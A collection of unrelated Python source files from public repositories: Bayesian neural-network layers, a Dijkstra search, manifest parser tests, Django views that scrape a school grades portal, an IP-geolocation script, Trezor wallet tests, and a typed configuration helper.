\"alvarezolmoandres@gmail.com\"]\n__status__ = \"Development\"\n\n\nclass GaussianDistribution:\n \"\"\"\n Trainable Distribution used as parameter for weight and bias in Bayesian layers.\n init - Initialise for the distribution.\n sigma - Calculates the sigma.\n sample_distribution - Samples a parameter from the distribution.\n log_posterior - Calculate the log posterior from a sampled parameter.\n \"\"\"\n\n def __init__(self, mu: torch.Tensor, rho: torch.Tensor, device: torch.device) -> None:\n \"\"\"\n Initialiser for the Distribution that saves parameters and defines a Normal distribution for the parameter.\n :param mu: The mean of the distribution.\n :param rho: The variance of the distribution.\n :param device: The PyTorch device the distribution will be stored on.\n \"\"\"\n\n self.mu = mu\n self.rho = rho\n self.device = device\n self.normal = torch.distributions.Normal(0, 1, validate_args=True)\n\n def sigma(self) -> torch.Tensor:\n \"\"\"\n Calculates the sigma of the distribution.\n :return: Torch Tensor of the sigma of the distribution.\n \"\"\"\n\n return torch.log1p(torch.exp(self.rho))\n\n def sample_distribution(self) -> torch.Tensor:\n \"\"\"\n Samples the normal distribution using the mean, variance and sigma.\n :return: Torch Tensor of the sampled parameters.\n \"\"\"\n\n e = self.normal.sample(self.rho.size()).to(self.device)\n return self.mu + self.sigma() * e\n\n def log_posterior(self, input: torch.Tensor) -> float:\n \"\"\"\n Calculates the log posterior for the sampled parameters.\n :param input: Torch Tensor with the sampled parameters.\n :return: Value with the log posterior.\n \"\"\"\n\n return (-math.log(math.sqrt(2 * math.pi)) - torch.log(self.sigma()) -\n ((input - self.mu) ** 2) / (2 * self.sigma() ** 2)).sum()\n\n\nclass ScaleMixtureGaussian:\n \"\"\"\n ScaleMixture model used as a prior for the weight and bias in a Bayesian Layer.\n init - Initialiser for the Scale Mixture Gaussian Distribution.\n log_prob - Calculates the log prior probability for the sampled parameter.\n \"\"\"\n\n def __init__(self, pi: torch.Tensor, sigma_1: torch.Tensor, sigma_2: torch.Tensor, device: torch.device) -> None:\n \"\"\"\n Initialiser for the Scale Mixture Gaussian Distribution a distribution used as the prior of a Bayesian layer.\n :param pi: Weighting for balancing the two Gaussian distributions.\n :param sigma_1: The variance for the first Gaussian 
distribution.\n :param sigma_2: The variance for the second Gaussian distribution.\n :param device: The device the distribution will be initialised on.\n \"\"\"\n\n self.pi = pi\n self.sigma_1 = sigma_1\n self.sigma_2 = sigma_2\n self.device = device\n self.gaussian_1 = torch.distributions.Normal(torch.tensor(0).to(device), sigma_1, validate_args=True)\n self.gaussian_2 = torch.distributions.Normal(torch.tensor(0).to(device), sigma_2, validate_args=True)\n\n def log_prob(self, input: torch.Tensor) -> float:\n \"\"\"\n Calculates the log_likelihood for each parameter sampled relative to a prior distribution.\n :param input: Torch.Tensor of the sampled parameters\n :return: The log probability of the input relative to the prior.\n \"\"\"\n\n prob_1 = torch.exp(self.gaussian_1.log_prob(input))\n prob_2 = torch.exp(self.gaussian_2.log_prob(input))\n\n return (torch.log(self.pi * prob_1 + (1 - self.pi) * prob_2)).sum()\n\n\nclass BayesianLinearLayer(nn.Module):\n \"\"\"\n Class for a Bayesian Fully Connected Layer that can be used to form a Bayesian Neural Network.\n init - Initialiser for the Bayesian layer that initialises the distributions for weights and biases.\n forward - Forward Propagation for the Bayesian Layer by sampling from the weight and bias distributions.\n \"\"\"\n\n def __init__(self, in_features: int, out_features: int, device: torch.device) -> None:\n \"\"\"\n Initialiser for the Bayesian Layer that initialises the distributions for the weights and biases.\n :param in_features: Integer for the number of input features in the layer.\n :param out_features: Integer for the number of output features in the layer.\n :param device: PyTorch Device the layer will be loaded on.\n \"\"\"\n\n # Calls the super for the nn.Module.\n super(BayesianLinearLayer, self).__init__()\n\n # Saves the number of in and out features in the class.\n self.in_features = in_features\n self.out_features = out_features\n\n # The parameter initialisation for the weights.\n self.weight_mu = nn.Parameter(torch.Tensor(out_features, in_features).normal_(0, 0.1))\n self.weight_rho = nn.Parameter(torch.Tensor(out_features, in_features).normal_(-7, 0.1))\n self.weight = GaussianDistribution(self.weight_mu, self.weight_rho, device)\n\n # The parameter initialisation for the biases.\n self.bias_mu = nn.Parameter(torch.Tensor(out_features).normal_(0, 0.1))\n self.bias_rho = nn.Parameter(torch.Tensor(out_features).normal_(-7, 0.1))\n self.bias = GaussianDistribution(self.bias_mu, self.bias_rho, device)\n\n # The parameter initialisation for the prior distribution.\n sigma_1 = torch.FloatTensor([math.exp(0.1)]).to(device)\n sigma_2 = torch.FloatTensor([math.exp(0.4)]).to(device)\n pi = torch.tensor(0.5).to(device)\n\n # The initialisation for the weight and bias priors.\n self.weight_prior = ScaleMixtureGaussian(pi, sigma_1, sigma_2, device)\n self.bias_prior = ScaleMixtureGaussian(pi, sigma_1, sigma_2, device)\n\n # Creates the class member for the log prior and log variational posterior.\n self.log_prior = 0\n self.log_variational_posterior = 0\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Performs forward propagation with the layer by sampling the weights and biases from the distibutions.\n :param x: PyTorch Tensor for the input image batch.\n :return: PyTorch Tensor of logits.\n \"\"\"\n\n # Samples the weight and bias from the distibutions.\n weight = self.weight.sample_distribution()\n bias = self.bias.sample_distribution()\n\n # Calculates the log prior and log variational posterior.\n 
self.log_prior = self.weight_prior.log_prob(weight) + self.bias_prior.log_prob(bias)\n self.log_variational_posterior = self.weight.log_posterior(weight) + self.bias.log_posterior(bias)\n\n # Performs forward propagation with the sampled weight and bias.\n return F.linear(x, weight, bias)\n","repo_name":"UoD-CVIP/Medical_Calibration","sub_path":"bayes_layers.py","file_name":"bayes_layers.py","file_ext":"py","file_size_in_byte":7558,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"74847551801","text":"import heapq\nimport time\nfrom typing import List, NamedTuple, Any\n\n\nclass Move(NamedTuple):\n score: int\n step_count: int\n state: Any\n path: List[Any]\n\n\nclass Step(NamedTuple):\n cost: int\n state: Any\n\n\nclass Dijkstra:\n def __init__(self, initial_state):\n self.visited = set()\n self.queue = []\n self.best = float(\"inf\")\n self.best_path = None\n self.pruned = 0 # removed because a shorter path has been found already\n self.duplicates = 0 # path ignored because node has already been visited\n self.iterations = 0\n self.report_rate = 1000 # print progress after this many iterations\n self.store_path = False\n self.add_move(0, initial_state, [])\n self.start_time = 0\n self.end_time = 0\n\n @property\n def time_taken(self):\n return self.end_time - self.start_time\n\n def add_move(self, step_count: int, state: Any, current_path: List):\n self.visited.add(self.serialise(state))\n path = []\n if self.store_path:\n path = current_path[:]\n path.append(state)\n heapq.heappush(self.queue, Move(score=self.score(state), step_count=step_count, state=state, path=path))\n\n @staticmethod\n def serialise(state):\n raise NotImplementedError\n\n def score(self, state) -> int:\n \"\"\"Lower is better. 
0 is winner\"\"\"\n return 0\n\n def valid_moves(self, state) -> List[Step]:\n raise NotImplementedError\n\n def search(self):\n self.start_time = time.process_time()\n while self.queue:\n move: Move = heapq.heappop(self.queue)\n self.iterations += 1\n\n if move.score == 0:\n self.best = min(self.best, move.step_count)\n self.best_path = move.path\n continue\n self.queue_new_moves(move)\n self.report()\n\n self.end_time = time.process_time()\n return self.best\n\n def report(self):\n if self.iterations % self.report_rate:\n return\n print(f\"{self.iterations:6} Q:{len(self.queue):6} Prune:{self.pruned:6} Dups:{self.duplicates:6} Best:{self.best}\")\n\n def queue_new_moves(self, move):\n for cost, new_move_state in self.valid_moves(move.state):\n new_step_count = move.step_count + cost\n if self.serialise(new_move_state) in self.visited:\n self.duplicates += 1\n continue\n if new_step_count >= self.best:\n self.pruned += 1\n continue\n self.add_move(new_step_count, new_move_state, move.path)\n","repo_name":"heroworkshop/advent_of_code","sub_path":"dijkstra.py","file_name":"dijkstra.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8049075413","text":"import pytest\n\nfrom ..manifest.manifest import split_header, Header, HeaderParser, ManifestError\n\n\ndef test_split_header():\n assert split_header(b'header\\n---\\ndata') == (b'header', b'data')\n assert split_header(b'\\n---\\ndata') == (b'', b'data')\n assert split_header(b'\\n---\\n') == (b'', b'')\n assert split_header(b'---\\ndata') == (b'', b'data')\n assert split_header(b'---\\n') == (b'', b'')\n with pytest.raises(ManifestError):\n split_header(b'--\\nno newline')\n with pytest.raises(ManifestError):\n split_header(b'no header')\n with pytest.raises(ManifestError):\n split_header(b'foo\\n-- \\nbar')\n\n\ndef test_parse_header():\n data = b'''\\\nsignature: |\n line 1\n line 2\n'''\n header = Header.from_bytes(data)\n assert header.signature == 'line 1\\nline 2'\n\n\ndef test_parse_header_empty():\n data = b''\n header = Header.from_bytes(data)\n assert header.signature is None\n\n\ndef test_parse_header_with_pubkey():\n # Pubkey is ignored, but a header should still be parsed.\n data = b'''\\\nsignature: |\n line 1\n line 2\npubkey: |\n line 3\n line 4\n'''\n header = Header.from_bytes(data)\n assert header.signature == 'line 1\\nline 2'\n\n\ndef test_header_to_bytes():\n header = Header('line 1\\nline 2')\n data = header.to_bytes()\n assert data == b'''\\\nsignature: |\n line 1\n line 2'''\n\n\ndef test_header_empty_to_bytes():\n header = Header(None)\n data = header.to_bytes()\n assert data == b''\n\n\ndef test_parser():\n parser = HeaderParser(b'''\\\nfoo: \"foo\"\nbar: |\n bar\n\n lines\nbaz: \"baz\"\n''')\n assert parser.parse_field() == ('foo', 'foo')\n assert parser.parse_field() == ('bar', 'bar\\n\\nlines')\n assert parser.parse_field() == ('baz', 'baz')\n assert parser.is_eof()\n\n\ndef test_parser_error():\n with pytest.raises(ManifestError, match='Unexpected line'):\n HeaderParser(b'foo: unquoted').parse_field()\n with pytest.raises(ManifestError, match='Unexpected line'):\n HeaderParser(b'foo: \"illegal\\\"characters\"').parse_field()\n with pytest.raises(ManifestError, match='Block literal cannot be empty'):\n HeaderParser(b'foo: |\\nbar: \"empty block\"').parse_field()\n\n with pytest.raises(ManifestError, match='Unexpected field'):\n HeaderParser(b'bar: \"wrong field\"').parse('baz')\n with 
pytest.raises(ManifestError, match='Duplicate field'):\n HeaderParser(b'bar: \"once\"\\nbar: \"twice\"').parse('bar')\n","repo_name":"golemfoundation/wildland-client","sub_path":"wildland/tests/test_manifest_header.py","file_name":"test_manifest_header.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"8537364217","text":"# -*- coding: utf-8 -*-\n\nfrom urllib2 import urlopen\nfrom django.conf import settings\n\nfrom rest_framework.views import APIView\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.decorators import permission_classes\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\nfrom common.http import install_wapiti_opener\nfrom common.common import find_string_between\nfrom grades.serializers import WapitiLoginSerializer\nfrom grades.parsers import (SchoolGradesParser, SchoolJuriesParser,\n SchoolCertificationsParser, SchoolYearsParser)\n\n\ndef get_years_urls(url):\n \"\"\"\n From default school grades page you have a list of all your years spent in\n Telecom. This function list those years by reading available links via\n SchoolYearsParser and return a dictionnary with keys being ['grades',\n 'juries', 'certifs'] and values a list of relative links.\n\n Ex: {'grades': ['/Commun/ens/adm/pf/pgs/etudiant/consulterResSco.aspx?' \\\\\n 'anSco=19&rangEtu=35 sur 83', link2, link3, ...],\n 'juries': [link1, link2, ...],\n 'certifs': [link1, link2, ...]}\n \"\"\"\n\n list_years_html = urlopen(url)\n\n list_years_data = \"\"\n for line in list_years_html.readlines():\n line = line.strip()\n list_years_data += line\n\n parser = SchoolYearsParser()\n parser.feed(list_years_data)\n\n years_urls = {}\n years_urls['grades'] = parser.grades_years\n years_urls['juries'] = parser.juries_years\n years_urls['certifs'] = parser.certifications_years\n\n parser.close()\n\n return years_urls\n\n\ndef get_year_grades(year_grades_url):\n \"\"\"\n Make use of SchoolGradesParser to parse all available data on your school\n year grades pages and compact it in one big JSON structure.\n\n Some data like the number of students and year id cannot be fetched on the\n page so the url to access the page is used instead.\n \"\"\"\n\n year_grades_html = urlopen(year_grades_url)\n\n year_grades_data = \"\"\n for line in year_grades_html.readlines():\n year_grades_data += line\n\n parser = SchoolGradesParser()\n parser.feed(year_grades_data)\n year_grades = parser.grades\n parser.close()\n\n # Workaround to get number of students in your schoolyear as well as\n # year `id`. I don't know why it is not accessible on the page...\n # Url example : '/Commun/ens/adm/pf/pgs/etudiant/consulterResSco.aspx?' \\\n # 'anSco=19&rangEtu=35 sur 83'\n # Note : I don't know exactly where does year id come from, but I suspect\n # it to be an incremented value since the year they released this grades\n # app. 
In this case, it would be school year 1995-1996 which could be\n # matching the first year of the first FIs.\n students = find_string_between(year_grades_url, 'sur ', None)\n year_id = find_string_between(year_grades_url, 'anSco=', '&rangEtu')\n\n year_grades['students'] = students\n year_grades['year_id'] = year_id\n\n return year_grades\n\n\ndef get_year_juries(year_juries_url):\n year_juries_html = urlopen(year_juries_url)\n\n year_juries_data = \"\"\n for line in year_juries_html.readlines():\n year_juries_data += line\n\n parser = SchoolJuriesParser()\n parser.feed(year_juries_data)\n year_juries = parser.juries\n parser.close()\n\n return year_juries\n\n\ndef get_year_certifications(year_certifications_url):\n year_certifications_html = urlopen(year_certifications_url)\n\n year_certifications_data = \"\"\n for line in year_certifications_html.readlines():\n year_certifications_data += line\n\n parser = SchoolCertificationsParser()\n parser.feed(year_certifications_data)\n year_certifications = parser.certifications\n parser.close()\n\n return year_certifications\n\n\n@permission_classes((AllowAny,))\nclass MyGradesView(APIView):\n \"\"\"\n === Access your school grades via webservice ! ===\n\n Anyone can access it since it does not provide anything else than what you\n can read on your wapiti pages. That's also why you need to provide your\n wapiti credentials each time your make a request here.\n \"\"\"\n\n def get(self, request, *args, **kwargs):\n \"\"\"\n === Return your school grades in JSON ===\n\n Since the amount of collected data can be huge depending on the number\n of years the student spent in Telecom Lille ;), and as swagger does not\n allow to format output with carriage return, an exemple of output can\n be found here : http://wiki.bdetl.org/doku.php?id=okapi_grades.\n\n You need to provide some JSON data in order to be able to access this\n endpoint. Indeed, Wapiti and Okapi credentials do not necessarly share\n the same login credentials. It will often be the same, but a student\n can gradute or can forget to synchronize his old password...\n\n Anyway, you need to provide wapiti_username and wapiti_password in\n application/form-data JSON. Keep always in mind that to access a\n resource on Wapiti you need to prefix your username by `elv/`. An error\n will remind you that if your loggin fails and your forget this prefix.\n It could be automaticaly added, but this kind of automation is more\n likely to be handled on user interface than on backend.\n\n Since you need to provide some application/form-data on a GET method,\n which is unorthodox, django rest framework tools do not provide\n built-in views to test the API... 
sorry for the inconvenience...\n \"\"\"\n\n serializer = WapitiLoginSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n\n wapiti_url = settings.WAPITI['url']\n user = serializer.validated_data['wapiti_username']\n passwd = serializer.validated_data['wapiti_password']\n install_wapiti_opener(wapiti_url, user, passwd)\n\n wapiti_login_url = '{}{}'.format(wapiti_url, settings.WAPITI['login'])\n urlopen(wapiti_login_url)\n\n years_overview_url = '{}{}'.format(\n wapiti_url, settings.WAPITI['years_overview'])\n grades_years_urls = get_years_urls(years_overview_url)['grades']\n\n grades = []\n for school_year_url in grades_years_urls:\n year_grades_url = '{}{}'.format(wapiti_url, school_year_url)\n year_grades = get_year_grades(year_grades_url)\n grades.append(year_grades)\n\n return Response(grades, status=status.HTTP_200_OK)\n\n\n@permission_classes((AllowAny,))\nclass MyJuriesView(APIView):\n \"\"\"\n === Access your school juries via webservice ! ===\n\n Anyone can access it since it does not provide anything else than what you\n can read on your wapiti pages. That's also why you need to provide your\n wapiti credentials each time your make a request here.\n \"\"\"\n\n def get(self, request, *args, **kwargs):\n \"\"\"\n === Return your school juries in JSON ===\n\n You need to provide some JSON data in order to be able to access this\n endpoint. Indeed, Wapiti and Okapi credentials do not necessarly share\n the same login credentials. It will often be the same, but a student\n can gradute or can forget to synchronize his old password...\n\n Anyway, you need to provide wapiti_username and wapiti_password in\n application/form-data JSON. Keep always in mind that to access a\n resource on Wapiti you need to prefix your username by `elv/`. An error\n will remind you that if your loggin fails and your forget this prefix.\n It could be automaticaly added, but this kind of automation is more\n likely to be handled on user interface than on backend.\n\n Since you need to provide some application/form-data on a GET method,\n which is unorthodox, django rest framework tools do not provide\n built-in views to test the API... sorry for the inconvenience...\n \"\"\"\n\n serializer = WapitiLoginSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n\n wapiti_url = settings.WAPITI['url']\n user = serializer.validated_data['wapiti_username']\n passwd = serializer.validated_data['wapiti_password']\n install_wapiti_opener(wapiti_url, user, passwd)\n\n wapiti_login_url = '{}{}'.format(wapiti_url, settings.WAPITI['login'])\n urlopen(wapiti_login_url)\n\n years_overview_url = '{}{}'.format(\n wapiti_url, settings.WAPITI['years_overview'])\n juries_years_urls = get_years_urls(years_overview_url)['juries']\n\n juries = []\n for school_year_url in juries_years_urls:\n year_juries_url = '{}{}'.format(wapiti_url, school_year_url)\n year_juries = get_year_juries(year_juries_url)\n juries.append(year_juries)\n\n return Response(juries, status=status.HTTP_200_OK)\n\n\n@permission_classes((AllowAny,))\nclass MyCertificationsView(APIView):\n \"\"\"\n === Access your school certifications via webservice ! ===\n\n Anyone can access it since it does not provide anything else than what you\n can read on your wapiti pages. 
That's also why you need to provide your\n wapiti credentials each time your make a request here.\n \"\"\"\n\n def get(self, request, *args, **kwargs):\n \"\"\"\n === Return your school certifications in JSON ===\n\n School certifications are english, german, spanish and whatsoever\n language exams that you can take in Telecom Lille. Results are\n supposed to be identical for each year. Despite that, a list item per\n year is returned in case one day there are different values.\n\n You need to provide some JSON data in order to be able to access this\n endpoint. Indeed, Wapiti and Okapi credentials do not necessarly share\n the same login credentials. It will often be the same, but a student\n can gradute or can forget to synchronize his old password...\n\n Anyway, you need to provide wapiti_username and wapiti_password in\n application/form-data JSON. Keep always in mind that to access a\n resource on Wapiti you need to prefix your username by `elv/`. An error\n will remind you that if your loggin fails and your forget this prefix.\n It could be automaticaly added, but this kind of automation is more\n likely to be handled on user interface than on backend.\n\n Since you need to provide some application/form-data on a GET method,\n which is unorthodox, django rest framework tools do not provide\n built-in views to test the API... sorry for the inconvenience...\n \"\"\"\n\n serializer = WapitiLoginSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n\n wapiti_url = settings.WAPITI['url']\n user = serializer.validated_data['wapiti_username']\n passwd = serializer.validated_data['wapiti_password']\n install_wapiti_opener(wapiti_url, user, passwd)\n\n wapiti_login_url = '{}{}'.format(wapiti_url, settings.WAPITI['login'])\n urlopen(wapiti_login_url)\n\n years_overview_url = '{}{}'.format(\n wapiti_url, settings.WAPITI['years_overview'])\n certifs_years_urls = get_years_urls(years_overview_url)['certifs']\n\n certifs = []\n for school_year_url in certifs_years_urls:\n year_certifs_url = '{}{}'.format(wapiti_url, school_year_url)\n year_certifs = get_year_certifications(year_certifs_url)\n certifs.append(year_certifs)\n\n return Response(certifs, status=status.HTTP_200_OK)\n","repo_name":"jbbqqf/okapi","sub_path":"grades/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14954415787","text":"# import execjs\n\n# def get_js():\n# f = open(\"Samples/GetLocJS.js\", 'r', encoding='utf-8')\n# line = f.readline()\n# htmlstr = ''\n# while line:\n# htmlstr = htmlstr+line\n# line = f.readline()\n# return htmlstr\n\n# def get_des_psswd(): \n# js_str = get_js()\n# ctx = execjs.compile(js_str) #加载JS文件\n# return (ctx.call('getLocation')) #调用js方法 第一个参数是JS的方法名,后面的data和key是js方法的参数\n\nfrom urllib.request import urlopen\nimport json\n\nmy_ip = urlopen('http://ip.42.pl/raw').read()\nip_str = str(my_ip.decode())\n\nresponse = urlopen(\"https://restapi.amap.com/v3/ip?key=24c1ffc0a6c3d2f1d06570335356875d&ip=\" + ip_str)\njs = json.load(response)\nstatus = js['status']\nif not status == '1':\n print(\"error\")\nrect = js['rectangle']\ncord_list = rect.split(';')\ncord1_long = float(cord_list[0].split(',')[0])\ncord1_lan = float(cord_list[0].split(',')[1])\ncord2_long = float(cord_list[1].split(',')[0])\ncord2_lan = float(cord_list[1].split(',')[1])\ncord_cen_long = (cord1_long + cord2_long) / 2\ncord_cen_lan = (cord1_lan + cord2_lan) / 
2\nprint(cord_cen_long)\nprint(cord_cen_lan)\n\nimport socket\n\ntry: \n s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM) \n s.connect(('8.8.8.8',80)) \n ip = s.getsockname()[0] \nfinally: \n s.close() \nprint(ip) ","repo_name":"chengtianle1997/xiaoshutong_chatting_robot","sub_path":"Samples/GetLocJS.py","file_name":"GetLocJS.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36040314260","text":"from itertools import combinations\n\nimport pytest\nfrom shamir_mnemonic import MnemonicError, shamir\n\nfrom trezorlib import device\nfrom trezorlib.debuglink import TrezorClientDebugLink as Client\nfrom trezorlib.exceptions import TrezorFailure\nfrom trezorlib.messages import BackupType\n\nfrom ...common import EXTERNAL_ENTROPY, WITH_MOCK_URANDOM, generate_entropy\nfrom ...input_flows import InputFlowSlip39BasicResetRecovery\n\npytestmark = [pytest.mark.skip_t1]\n\n\ndef reset_device(client: Client, strength: int):\n member_threshold = 3\n\n with WITH_MOCK_URANDOM, client:\n IF = InputFlowSlip39BasicResetRecovery(client)\n client.set_input_flow(IF.get())\n\n # No PIN, no passphrase, don't display random\n device.reset(\n client,\n display_random=False,\n strength=strength,\n passphrase_protection=False,\n pin_protection=False,\n label=\"test\",\n language=\"en-US\",\n backup_type=BackupType.Slip39_Basic,\n )\n\n # generate secret locally\n internal_entropy = client.debug.state().reset_entropy\n secret = generate_entropy(strength, internal_entropy, EXTERNAL_ENTROPY)\n\n # validate that all combinations will result in the correct master secret\n validate_mnemonics(IF.mnemonics, member_threshold, secret)\n\n # Check if device is properly initialized\n assert client.features.initialized is True\n assert client.features.needs_backup is False\n assert client.features.pin_protection is False\n assert client.features.passphrase_protection is False\n assert client.features.backup_type is BackupType.Slip39_Basic\n\n # backup attempt fails because backup was done in reset\n with pytest.raises(TrezorFailure, match=\"ProcessError: Seed already backed up\"):\n device.backup(client)\n\n\n@pytest.mark.setup_client(uninitialized=True)\ndef test_reset_device_slip39_basic(client: Client):\n reset_device(client, 128)\n\n\n@pytest.mark.setup_client(uninitialized=True)\ndef test_reset_device_slip39_basic_256(client: Client):\n reset_device(client, 256)\n\n\ndef validate_mnemonics(mnemonics, threshold, expected_ems):\n # We expect these combinations to recreate the secret properly\n for test_group in combinations(mnemonics, threshold):\n groups = shamir.decode_mnemonics(test_group)\n ems = shamir.recover_ems(groups)\n assert expected_ems == ems.ciphertext\n # We expect these combinations to raise MnemonicError\n for test_group in combinations(mnemonics, threshold - 1):\n with pytest.raises(MnemonicError, match=f\".*Expected {threshold} mnemonics.*\"):\n shamir.combine_mnemonics(test_group)\n","repo_name":"trezor/trezor-firmware","sub_path":"tests/device_tests/reset_recovery/test_reset_slip39_basic.py","file_name":"test_reset_slip39_basic.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","stars":1147,"dataset":"github-code","pt":"40"} +{"seq_id":"24460770723","text":"REVERSE_KEYBOARD = {\n \"a\": \"2\", \"b\": \"2\", \"c\": \"2\",\n \"d\": \"3\", \"e\": \"3\", \"f\": \"3\",\n \"g\": \"4\", \"h\": \"4\", \"i\": \"4\",\n \"j\": \"5\", \"k\": \"5\", \"l\": \"5\",\n 
\"m\": \"6\", \"n\": \"6\", \"o\": \"6\",\n \"p\": \"7\", \"q\": \"7\", \"r\": \"7\", \"s\": \"7\",\n \"t\": \"8\", \"u\": \"8\", \"v\": \"8\",\n \"w\": \"9\", \"x\": \"9\", \"y\": \"9\", \"z\": \"9\",\n}\nclass TrieNode:\n def __init__(self):\n self.word_count = 0\n self.children = {}\n\n def add(self, word):\n node = self\n for char in word:\n if char not in node.children:\n node.children[char] = TrieNode()\n node = node.children[char]\n node.word_count += 1\n\nclass Solution:\n \"\"\"\n @param queries: the queries\n @param dict: the words\n @return: return the queries' answer\n \"\"\"\n def letterCombinationsII(self, queries, dict):\n root = TrieNode()\n for word in dict:\n digit_word = ''.join([REVERSE_KEYBOARD[char] for char in word])\n root.add(digit_word)\n\n res = []\n for query in queries:\n node = root\n for digit in query:\n if digit not in node.children:\n node = None\n break\n node = node.children[digit]\n res.append(node.word_count if node else 0)\n return res\nif __name__ == '__main__':\n query = [\"2\", \"3\", \"4\"]\n dict = [\"a\", \"abc\", \"de\", \"fg\"]\n s = Solution()\n print(s.letterCombinationsII(query, dict))","repo_name":"HaydenInEdinburgh/LintCode","sub_path":"270_letter_combinations_of_a_phone_number_II.py","file_name":"270_letter_combinations_of_a_phone_number_II.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17224649361","text":"#!/usr/bin/env python\n\n\"\"\"\nBuilds a configuration object out of type annotations.\n\nDefine a subclass with annotations:\n\n>>> class BasicConfig(TypedConfig):\n... INTEGER: int\n... FLOAT: float\n... COMPLEX: complex\n... BOOLEAN: bool\n... STRING: str\n\nProvide required values in the environment or other means supported by python-decouple:\n\n>>> import os\n>>> os.environ.update({\"INTEGER\": \"6\",\n... \"FLOAT\": \"5.6\",\n... \"COMPLEX\": \"3+4j\",\n... \"BOOLEAN\": \"true\",\n... \"STRING\": \"abcdefg\"})\n\nConfiguration is evaluated at instantiation time:\n\n>>> c = BasicConfig()\n>>> c.INTEGER, c.FLOAT, c.COMPLEX, c.BOOLEAN, c.STRING\n(6, 5.6, (3+4j), True, 'abcdefg')\n\nValues without defaults are required:\n\n>>> class RequiredConfig(TypedConfig):\n... MUST_HAVE: str\n>>> RequiredConfig()\nTraceback (most recent call last):\n ...\ndecouple.UndefinedValueError: MUST_HAVE not found. Declare it as envvar or define a default value.\n\nValues with optional types have a default value of None:\n\n>>> class OptionalConfig(TypedConfig):\n... MAYBE: t.Optional[int]\n>>> c = OptionalConfig()\n>>> c.MAYBE is None\nTrue\n\nValues with literal assignments get that value by default:\n\n>>> class DefaultConfig(TypedConfig):\n... DEFAULT: float = 5.8\n>>> DefaultConfig().DEFAULT\n5.8\n\nBut default values are still overridden by the environment or settings:\n\n>>> os.environ[\"DEFAULT\"] = \"2\"\n>>> DefaultConfig().DEFAULT\n2.0\n\nOf course this applies to optional types as well:\n\n>>> os.environ[\"MAYBE\"] = \"4\"\n>>> OptionalConfig().MAYBE\n4\n\nList annotations are automatically cast using decouple.Csv:\n\n>>> os.environ[\"FLOATS\"] = \"2,3.6,7\"\n>>> class ListConfig(TypedConfig):\n... FLOATS: t.List[float]\n>>> ListConfig().FLOATS\n[2.0, 3.6, 7.0]\n\nBut can still be optional or have defaults:\n\n>>> class DefaultListConfig(TypedConfig):\n... MAYBE_STRINGS: t.Optional[t.List[str]]\n... 
INTEGERS: t.List[int] = \" 4, 100, 12\"\n>>> c = DefaultListConfig()\n>>> c.MAYBE_STRINGS is None, c.INTEGERS\n(True, [4, 100, 12])\n\nYou can provide additional casts for types:\n\n>>> import pathlib as p, base64\n>>> os.environ['BIN64'] = 'aGVsbG8gd29ybGQ='\n>>> class PathConfig(TypedConfig):\n... SOMEWHERE: p.Path = '/tmp'\n... BIN64: bytes\n>>> c = PathConfig({p.Path: p.Path, bytes: lambda s: base64.b64decode(str.encode(s))})\n>>> c.SOMEWHERE.name, c.BIN64\n('tmp', b'hello world')\n\nNames starting with underscores are ignored.\nNames can be explicitly ignored as well.\nThis is useful when you want to provide a literal or your own config manually.\n\n>>> class IgnoredValueConfig(TypedConfig):\n... NORMAL_BYTES: bytes = 'hi'\n... APP_PATH = p.Path(__file__).parent.absolute()\n... _NOTHING: int\n... BIN64: bytes = decouple.config('BIN64', cast=lambda s: base64.b64decode(str.encode(s)))\n>>> c = IgnoredValueConfig(ignored_names={'APP_PATH', 'BIN64'})\n>>> c.APP_PATH.name\n'typed-config'\n>>> hasattr(c, '_NOTHING')\nFalse\n\nIt's also the only way to cast one type two different ways.\n\n>>> c.NORMAL_BYTES, c.BIN64\n(b'hi', b'hello world')\n\"\"\"\n\nimport functools, typing as t, decouple, distutils.util\n\n\n##\n# We need to map all supported type annotations into cast functions.\n# A cast function is a function that takes a string and returns a particular type.\n# Most primitive types in Python already do this: int('9') -> 9.\nSomeType = t.TypeVar('SomeType')\nCastType = t.Callable[[t.Optional[str]], t.Optional[SomeType]]\n\n\ndef optional(cast: t.Callable[[str], SomeType]) -> CastType:\n \"\"\"A decorator that takes a cast function and returns an optional cast function.\"\"\"\n @functools.wraps(cast)\n def maybe(s: t.Optional[str]) -> t.Optional[SomeType]:\n return cast(s) if s else None\n return maybe\n\n\ncast_bool = decouple.Config(None)._cast_boolean\n\ndefault_casts = {\n int: int,\n float: float,\n complex: complex,\n bool: cast_bool,\n str: str,\n bytes: str.encode,\n\n t.List[int]: decouple.Csv(int),\n t.List[float]: decouple.Csv(float),\n t.List[complex]: decouple.Csv(complex),\n t.List[bool]: decouple.Csv(cast_bool),\n t.List[str]: decouple.Csv(str),\n t.List[bytes]: decouple.Csv(str.encode),\n\n t.Optional[int]: optional(int),\n t.Optional[float]: optional(float),\n t.Optional[complex]: optional(complex),\n t.Optional[bool]: optional(cast_bool),\n t.Optional[str]: optional(str),\n t.Optional[bytes]: optional(str.encode),\n\n t.Optional[t.List[int]]: optional(decouple.Csv(int)),\n t.Optional[t.List[float]]: optional(decouple.Csv(float)),\n t.Optional[t.List[complex]]: optional(decouple.Csv(complex)),\n t.Optional[t.List[bool]]: optional(decouple.Csv(cast_bool)),\n t.Optional[t.List[str]]: optional(decouple.Csv(str)),\n 